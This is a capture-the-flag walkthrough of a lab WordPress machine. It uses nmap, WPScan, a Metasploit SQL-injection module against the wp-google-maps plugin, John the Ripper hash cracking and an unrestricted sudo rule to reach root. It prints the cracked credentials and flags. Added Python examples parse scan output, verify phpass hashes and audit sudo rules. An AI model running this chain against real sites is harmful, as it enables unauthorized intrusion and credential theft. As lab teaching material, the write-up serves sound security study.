We find the IP of the vulnerable machine to be 192.168.10.13
2. Scanning
2.1 Nmap
Using nmap to find the open ports and the services behind them:
nmap -p- -sV 192.168.10.13
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 21:20 IST
Nmap scan report for 192.168.10.13
Host is up (0.42s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
10000/tcp open ssl/http MiniServ 1.890 (Webmin httpd)
MAC Address: 08:00:27:28:F0:0B (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We find four open TCP ports: 21 (FTP, vsftpd 3.0.3), 22 (SSH, OpenSSH 7.4p1), 80 (HTTP, Apache 2.4.25) and 10000 (HTTPS, Webmin MiniServ 1.890).
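A small parser for the port table above, added here as an example and not part of the original write-up: it turns the `nmap -sV` output into a service inventory and diffs it against an expected-exposure baseline (the baseline of "only 22 and 80 should be reachable" is an assumption made for the example), which is the check a defender would run on the same scan.

```python
"""Parse `nmap -sV` output into a service inventory and diff it against an
expected-exposure baseline (added example; not part of the original write-up)."""
import re
from dataclasses import dataclass

# Scan output copied from the nmap run shown above.
NMAP_OUTPUT = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 21:20 IST
Nmap scan report for 192.168.10.13
Host is up (0.42s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
10000/tcp open  ssl/http MiniServ 1.890 (Webmin httpd)
MAC Address: 08:00:27:28:F0:0B (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One row of nmap's port table: "<port>/<proto> <state> <service> [<version>]".
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap(text: str) -> list[Service]:
    """Return the port-table rows; banner, header and footer lines are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            services.append(Service(int(m["port"]), m["proto"], m["state"],
                                    m["service"], m["version"].strip()))
    return services


def unexpected_exposure(services: list[Service], allowed_ports: set) -> list[Service]:
    """Open services not in the (assumed) baseline; these are the findings to triage."""
    return [s for s in services
            if s.state == "open" and (s.port, s.proto) not in allowed_ports]


def cleartext_services(services: list[Service]) -> list[Service]:
    """Open services whose protocol sends credentials unencrypted (FTP, Telnet, plain HTTP)."""
    return [s for s in services
            if s.state == "open" and s.service in {"ftp", "telnet", "http"}]


if __name__ == "__main__":
    svcs = parse_nmap(NMAP_OUTPUT)
    baseline = {(22, "tcp"), (80, "tcp")}          # assumption for the example
    for s in unexpected_exposure(svcs, baseline):
        print(f"unexpected: {s.port}/{s.proto} {s.service} {s.version}")
    for s in cleartext_services(svcs):
        print(f"cleartext:  {s.port}/{s.proto} {s.service}")
```

On this scan the baseline diff flags FTP on 21 and Webmin on 10000, and the cleartext check flags FTP and the plain-HTTP WordPress site on 80, which is where the login form lives.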
Using Wappalyzer on the webpage running on port 80 we see that it uses WordPress CMS.
3. Initial Foothold
3.1 WPScan
Using WPScan to enumerate plugins and look for vulnerable ones:
wpscan --url http://192.168.10.13
_______________________________________________________________
[i] Plugin(s) Identified:
[+] wp-google-maps
| Location: http://192.168.10.13/wp-content/plugins/wp-google-maps/
| Last Updated: 2022-03-03T08:07:00.000Z
| [!] The version is out of date, the latest version is 8.1.21
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.10.02 (50% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.10.13/wp-content/plugins/wp-google-maps/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===============================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Mar 17 21:29:28 2022
[+] Requests Done: 173
[+] Cached Requests: 5
[+] Data Sent: 42.98 KB
[+] Data Received: 414.952 KB
[+] Memory used: 224.848 MB
[+] Elapsed time: 00:00:06
We find that the wp-google-maps plugin is installed at version 7.10.02, which is out of date and may be vulnerable.
3.2 Metasploit
We find a Metasploit module for the plugin: auxiliary/admin/http/wp_google_maps_sqli
Using the auxiliary module and setting RHOSTS to 192.168.10.13:
[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> show options
Module options (auxiliary/admin/http/wp_google_maps_sqli):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
DB_PREFIX  wp_              yes       WordPress table prefix
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT      80               yes       The target port (TCP)
SSL        false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                yes       The base path to the wordpress application
VHOST                       no        HTTP server virtual host
[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> set RHOSTS 192.168.10.13
RHOSTS => 192.168.10.13
[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> run
[*] Running module against 192.168.10.13
[*] 192.168.10.13:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20220317213725_default_192.168.10.13_wp_google_maps.j_909026.bin
[+] 192.168.10.13:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
We get a username and a password hash: webmaster / $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1
3.3 Cracking the hash
To crack the hash, we save it into a file called passwd.txt and run John the Ripper against it with the rockyou wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
kittykat1 (?)
1g 0:00:00:01 DONE (2022-03-17 21:52) 0.5076g/s 5080p/s 5080c/s 5080C/s sandara..ilovewill
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
We get the password kittykat1.
Using SSH, we can log in to the machine as webmaster:
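The hash John loaded is a WordPress "portable" phpass hash: the `$P$` prefix means salted MD5, and the fourth character (`B`) encodes the iteration count as 2^13 = 8192, which is exactly the "Cost 1" John reported. The following Python port of phpass' crypt_private()/encode64() routines is an added example, not code from the write-up; it lets a defender inspect a wp_users dump for legacy hashes and check how much work each guess costs. The phpass algorithm itself is public domain; the constructed test password and the salt-generation helper are this example's own.

```python
"""Inspect and verify WordPress portable phpass hashes ($P$/$H$).
Python port of phpass crypt_private()/encode64() (added example;
not the original write-up's code)."""
import hashlib
import hmac
import secrets

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
PAGE_HASH = "$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1"   # the webmaster hash recovered above


def _encode64(data: bytes, count: int) -> str:
    """phpass' own base64 variant (not RFC 4648): 3 input bytes -> 4 itoa64 chars."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def inspect_phpass(setting: str) -> dict:
    """Decode scheme, cost and salt from the 12-char setting prefix of a phpass string."""
    if len(setting) < 12 or setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    cost_log2 = ITOA64.index(setting[3])
    if not 7 <= cost_log2 <= 30:          # same bounds phpass enforces
        raise ValueError("cost out of range")
    return {"scheme": setting[:3], "cost_log2": cost_log2,
            "iterations": 1 << cost_log2, "salt": setting[4:12]}


def phpass_hash(password: str, setting: str) -> str:
    """MD5(salt + pw), then 2**cost_log2 rounds of MD5(prev + pw); 34-char result."""
    info = inspect_phpass(setting)
    pw = password.encode("utf-8")
    digest = hashlib.md5(info["salt"].encode("ascii") + pw).digest()
    for _ in range(info["iterations"]):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)


def new_setting(cost_log2: int = 13) -> str:
    """Fresh $P$ setting with WordPress' default cost ('B' = 2**13 = 8192).
    Salt drawn from ITOA64 directly (example helper; phpass encodes random bytes)."""
    salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    return "$P$" + ITOA64[cost_log2] + salt


if __name__ == "__main__":
    print(inspect_phpass(PAGE_HASH))        # iterations == 8192, John's "Cost 1"
    print(verify("kittykat1", PAGE_HASH))   # the password John recovered above
```

The audit point: 8192 MD5 rounds is cheap enough that John reported roughly 5,000 candidates per second on a single core in the run above, so any weak password in a `$P$` hash is recoverable from a leaked wp_users table. Flag every `$P$`/`$H$` row in a dump as legacy and plan a migration to bcrypt or Argon2 with rehash-on-login.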
webmaster@HF2019-Linux:~$ ls
flag.txt
webmaster@HF2019-Linux:~$ cat flag.txt
83cad236438ff0c0dbce55d7f0034aee18f5c39
4. Privilege Escalation
Running sudo -l, we find that webmaster may run any command as root:
webmaster@HF2019-Linux:~$ sudo -l
Matching Defaults entries for webmaster on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User webmaster may run the following commands on localhost:
    (ALL) ALL
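An `(ALL) ALL` rule for a web-application service account is the finding to write up here. The following auditor for `sudo -l` output is an added example, not part of the original write-up; the sample it parses combines the rule found on this box with two constructed rules so that the different severities show.

```python
"""Audit `sudo -l` output for over-broad rules (added example; not part of the
original write-up). The first rule below is the one found on the box; the other
two are constructed for the example."""
import re
from dataclasses import dataclass

SUDO_L_OUTPUT = """\
Matching Defaults entries for webmaster on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User webmaster may run the following commands on localhost:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (www-data) /usr/bin/tail /var/log/apache2/access.log
"""

# One rule line: "(runas[:group]) [TAG: ...] command list"
RULE_LINE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


@dataclass(frozen=True)
class SudoFinding:
    runas: str
    commands: str
    nopasswd: bool
    severity: str


def audit_sudo_l(text: str) -> list[SudoFinding]:
    """Parse the rules section of `sudo -l` and rate each rule."""
    findings = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True          # everything before this is Defaults noise
            continue
        if not in_rules:
            continue
        m = RULE_LINE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m["tags"].split()}
        nopasswd = "NOPASSWD" in tags
        cmds = m["cmds"].strip()
        if cmds == "ALL":
            severity = "critical"    # unrestricted: equivalent to a root shell
        elif nopasswd:
            severity = "medium"      # scoped command, but no password gate
        else:
            severity = "info"
        findings.append(SudoFinding(m["runas"].strip(), cmds, nopasswd, severity))
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SUDO_L_OUTPUT):
        print(f"[{f.severity:8}] runas={f.runas!r} nopasswd={f.nopasswd} cmds={f.commands}")
```

The fix on the defending side is to replace `(ALL) ALL` with the specific commands the account actually needs (a service restart, a log tail) and to keep the password prompt unless an automation genuinely requires NOPASSWD.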
webmaster@HF2019-Linux:~$ sudo su
root@HF2019-Linux:/home/webmaster# whoami
root
flag.txt
root@HF2019-Linux:/# cd /root
root@HF2019-Linux:~# ls
flag.txt
root@HF2019-Linux:~# cat flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624